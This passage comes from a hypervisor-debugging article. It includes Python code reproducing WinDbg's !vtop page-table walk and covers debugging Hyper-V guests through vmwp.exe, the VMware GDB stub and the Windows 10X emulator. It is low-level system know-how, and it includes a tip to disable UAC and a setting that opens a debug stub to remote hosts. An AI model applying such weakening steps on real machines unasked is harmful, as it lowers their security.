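def read_entry(phys_mem, paddr):
    """Read one 8-byte table entry; an address we never wrote reads as 0 (not present)."""
    return phys_mem.get(paddr, 0)


def vtop(cr3, va, phys_mem):
    """Translate va through the paging hierarchy rooted at cr3.

    Returns (phys, steps): phys is the physical address, or None when a
    not-present entry ends the walk; steps lists (level, entry_addr, entry).
    """
    steps = []
    table = cr3 & FRAME_MASK
    for level, shift, large in LEVELS:
        entry_addr = table + ((va >> shift) & 0x1FF) * 8
        entry = read_entry(phys_mem, entry_addr)
        steps.append((level, entry_addr, entry))
        if not entry & PRESENT:
            return None, steps
        if large and entry & PS_BIT:
            # Large page: the frame starts at the page-size boundary, the rest of va is offset.
            frame = entry & FRAME_MASK & ~(large - 1)
            return frame | (va & (large - 1)), steps
        table = entry & FRAME_MASK
    return table | (va & 0xFFF), steps       # 4 KiB page reached through a PTE


def format_walk(cr3, va, phys_mem):
    """Render the walk in the same shape as the !vtop output in the article."""
    phys, steps = vtop(cr3, va, phys_mem)
    lines = [f"Amd64VtoP: Virt {va:x}, pagedir {cr3 & FRAME_MASK:016x}"]
    for level, entry_addr, entry in steps:
        lines.append(f"Amd64VtoP: {level} {entry_addr:016x}")
        if not entry & PRESENT:
            lines.append(f"Amd64VtoP: {level} not present")
    if phys is None:
        lines.append(f"Virtual address {va:x} is not mapped.")
    else:
        if steps[-1][0] != "PTE":
            lines.append(f"Amd64VtoP: Large page mapped phys {phys:016x}")
        lines.append(f"Virtual address {va:x} translates to physical address {phys:x}.")
    return lines


if __name__ == "__main__":
    print("\n".join(format_walk(0x10839D000, 0xFFFFFBB3AA6C3E66, SAMPLE_PHYS_MEM)))
```

<p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Running the block prints the same PML4E, PDPE and PDE entry addresses as the !vtop session. Replacing SAMPLE_PHYS_MEM with qwords read from physical memory with !dq turns it into a manual cross-check of a translation when no symbols are loaded, and an address whose PDE is missing takes the not-present path.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">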
The second parameter is the virtual address.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> !vtop 0x10839d000 0xfffffbb3aa6c3e66</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Virt fffffbb3aa6c3e66, pagedir 000000010839d000</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PML4E 000000010839dfb8</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDPE 000000010a603670</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDE 000000010a604a98</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Large page mapped phys 00000001000c3e66</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Virtual address fffffbb3aa6c3e66 translates to physical address 1000c3e66.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!pte2va</span></p><p dir="ltr" style="line-height: 1.2; 
margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!ptov <cr3</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dx</span><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> extension is available too, but with some limitations (because no symbols are available):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">@$debuggerRootNamespace.Debugger.State.PseudoRegisters.General.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Exentry</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pseudo-register shows the hvix64.exe entry point.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 29px; overflow: hidden; width: 299px;"><img height="29" 
src="https://lh4.googleusercontent.com/7fosR3YyT__Y_VhPknDzyiWpa153zafAqw6pH_hdzWuUFe-iXqdtj2WWf9_M4-JhzyH_vgNF9VB4V2L8y9SiqXevwBgxLphYo5_n2odJlVPP_wW7Gj2AKO6CtBIpsf9xq_ENsM3Bx4ZIceOHoQ" style="margin-left: 0px; margin-top: 0px;" width="299" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging using embedded vmwp.exe capabilities</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A guest Hyper-V VM can be debugged using the debugging capabilities of the worker management process (vmwp.exe), as mentioned by Jake Oshins on OSR Online (</span><a href="https://community.osr.com/discussion/234398" style="text-decoration: none;"><span face="Calibri,sans-serif" 
style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://community.osr.com/discussion/234398</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and Rafael Rivera (@WithinRafael) in his blog:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><a href="https://withinrafael.com/2015/02/01/how-to-set-up-synthetic-kernel-debugging-for-hyper-v-virtual-machines" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://withinrafael.com/2015/02/01/how-to-set-up-synthetic-kernel-debugging-for-hyper-v-virtual-machines</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I updated Jake Oshins’s script and uploaded it to github.com:</span></p><p dir="ltr" 
style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><a href="https://github.com/gerhart01/Hyper-V-scripts/blob/master/hyperv-dbg-2019.ps1" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts/blob/master/hyperv-dbg-2019.ps1</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 and Windows Server 2019 don’t need additional files for it to work. 
The script can configure the guest VM using the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PowerShell Direct</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> feature.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shut down the guest OS.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> set the parameters of the hyperv-dbg-2019.ps1 script</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 28.35pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 50px; overflow: hidden; width: 471px;"><img height="50" src="https://lh5.googleusercontent.com/oiIBgbXectTEPnhWVPEvifG3IkUQlLYRF0BCR7px9LkWAE0W8FrR4wFtwVjmJ1V-aohqsDiGv4yzvI53d14WsfmDeQl_NTaGD5LiN96GDvOnmNNPyV8xXsOSXI-NgO8drWuTl99lPNFmvsmvWg" style="margin-left: 0px; margin-top: 0px;" width="471" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> run the script in the root partition (use "Run as Administrator", or disable UAC: run gpedit.msc and set Computer Configuration \ Windows Settings \ Security Settings \ Local Policies \ Security Options \ User Account Control: Run all administrators in Admin Approval Mode to Disabled)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> start WinDBG: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG -k net:port=50010,target=127.0.0.1,key=1.2.3.4</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> execute the command </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">break (Ctrl+break), </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then the debugger will stop inside the guest OS. 
You can inspect the VM using standard WinDBG commands, but intensive debugging may cause the guest VM to hang. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging using VMware GDB stub</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMware Workstation supports an embedded GDB debugger. 
To enable it, add the following lines to the .vmx file of the VM (the .remote setting makes the stub accept connections from other hosts, not only from localhost):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.listen.guest64 = "TRUE"</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.listen.guest64.remote = "TRUE" – for remote debugging</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.hideBreakpoints = "TRUE"</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">monitor.debugOnStartGuest64 = "TRUE" – stop on BIOS loading</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; 
margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then you can attach IDA PRO, Ghidra or radare2 to the GDB stub.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See the GDB debugging example in part 3 of the article (debugging the hypervisor).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging Windows 10X emulator</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br 
/></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Windows 10X emulator is Hyper-V based: the emulator OS runs as a Hyper-V VM, and Windows 10X itself runs as a nested VM.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Alex Ionescu (@aionescu) and @WithinRafael showed interesting methods for obtaining the debugging settings:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><a href="https://twitter.com/aionescu/status/1237639135088611329" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://twitter.com/aionescu/status/1237639135088611329</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><a href="https://twitter.com/WithinRafael/status/1237813722803924992" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; 
font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://twitter.com/WithinRafael/status/1237813722803924992</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can mount </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">flash.vhdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (double-click the file) from the emulator, which is located in </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">C:\ProgramFiles\WindowsApps\Microsoft.Windows10XEmulatorImage10.0.19578.0Previ_1.0.1.0_x64__8wekyb3d8bbwe\Content (copy it to another location if you get access rights errors). 
